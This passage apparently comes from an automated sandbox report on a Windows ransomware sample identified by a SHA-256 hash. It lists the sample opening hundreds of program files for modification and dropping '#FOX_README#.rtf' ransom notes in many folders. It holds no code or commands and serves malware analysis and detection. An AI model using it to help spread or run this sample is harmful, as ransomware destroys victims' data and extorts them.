f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ShowSearch.vsx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File 